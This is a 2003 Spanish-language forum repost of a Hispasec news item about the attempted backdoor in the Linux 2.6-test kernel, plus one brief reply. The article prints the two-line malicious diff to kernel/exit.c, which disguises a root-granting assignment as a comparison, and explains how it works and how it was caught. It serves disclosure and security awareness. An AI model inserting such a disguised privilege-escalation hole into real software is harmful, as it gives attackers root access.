[OT-Info] Intento de instalar una puerta trasera en el kernel

22/11/2003 - 11:16 por Javier Inglés [MS MVP] | Informe spam
-
Hispasec - una-al-día 21/11/2003
Todos los días una noticia de seguridad www.hispasec.com
-

Intento de instalar una puerta trasera en el kernel Linux


Un análisis rutinario automático del código fuente de la última versión
del kernel Linux (2.6-test) descubre el intento de implantar una puerta
trasera en dicho sistema operativo.

Linux es un sistema operativo Open Source en boga, cuya popularidad
crece día a día.

La última versión del kernel Linux (2.6 test), aún en desarrollo,
experimentó un intento de implantarle una puerta trasera, que permitiría
a un atacante local obtener privilegios de administrador o "root" con
la ejecución de una función aparentemente inocua y de uso normal.

El fichero alterado fue "kernel/exit.c", y constaba de apenas dos líneas
de código fuente:

















- GOOD 2003-11-05 13:46:44.000000000 -0800
+++ BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
schedule();
goto repeat;
}
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
retval = -ECHILD;
end_wait4:
current->state = TASK_RUNNING;

<<<<<

La puerta trasera, muy inteligente, explota el hecho de que el lenguaje
de programación C permite asignaciones en lugares insospechados, como
dentro de una sentencia "if". El efecto neto de este cambio sería
obtener privilegios de administrador o "root" si se invoca la función
"sys_wait4()" con los parámetros apropiados ("__WCLONE" y "__WALL"). A
la vista del cambio, el atacante ha mostrado cierta destreza para lograr
que el código no sea patentemente malicioso.

El cambio se realizó en la réplica CVS que reside en el servidor
"kernel.bkbits.net". Dicha réplica se obtiene automáticamente a través
de los fuentes oficiales de Linux, gestionados mediante la herramienta
"BitKeeper". La alteración afectó a la réplica, no a los fuentes
originales.

Aunque el cambio fue detectado de forma automática por la
herramientas de exportación BitKeeper->CVS, el incidente servirá como
llamada de atención y para desplegar nuevas tecnologías, como el
requerir una firma digital autorizada para poder realizar cambios en el
kernel. Dado que la exportación BitKeeper->CVS se realiza de forma
diaria, el fichero alterado se detectó y eliminó en menos de 24 horas.

Para los usuarios de entornos Linux, el mejor consejo que se puede dar
es descargar las actualizaciones desde fuentes de confianza y verificar,
si existen, sus firmas digitales.

Opina sobre esta noticia:
http://www.hispasec.com/unaaldia/1853/comentar

Más Información:

Linux: Kernel "Back Door" Attempt
http://kerneltrap.org/node/view/1584

Intentan 'colar' una puerta trasera en el núcleo Linux
http://barrapunto.com/article.pl?sid/11/06/1515210

Linux Kernel Back-Door Hack Attempt Discovered
http://slashdot.org/articles/03/11/06/058249.shtml

BK2CVS problem
http://www.ussg.iu.edu/hypermail/li.../0621.html

Re: BK2CVS problem
http://www.ussg.iu.edu/hypermail/li.../0635.html

Re: BK2CVS problem
http://www.ussg.iu.edu/hypermail/li.../0699.html


Salu2!!

Javier Inglés
MS-MVP

e-m@il:jjingles2000@NOSPAMhotmail.com
<<<QUITAR "NOSPAM" PARA MANDAR MAIL>>>

Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho
 

Leer las respuestas

#1 Ille Corvus
22/11/2003 - 19:55 | Informe spam
El Sat, 22 Nov 2003 11:16:51 +0100, Javier Inglés [MS MVP]
escribio:

Puedes pronunciar Linux o mejor GNU/Linux y se soluciono en MENOS de
24 horas.

El conocimiento te hara libre

Salu2


Ille Corvus. Hic et Nunc.

Preguntas similares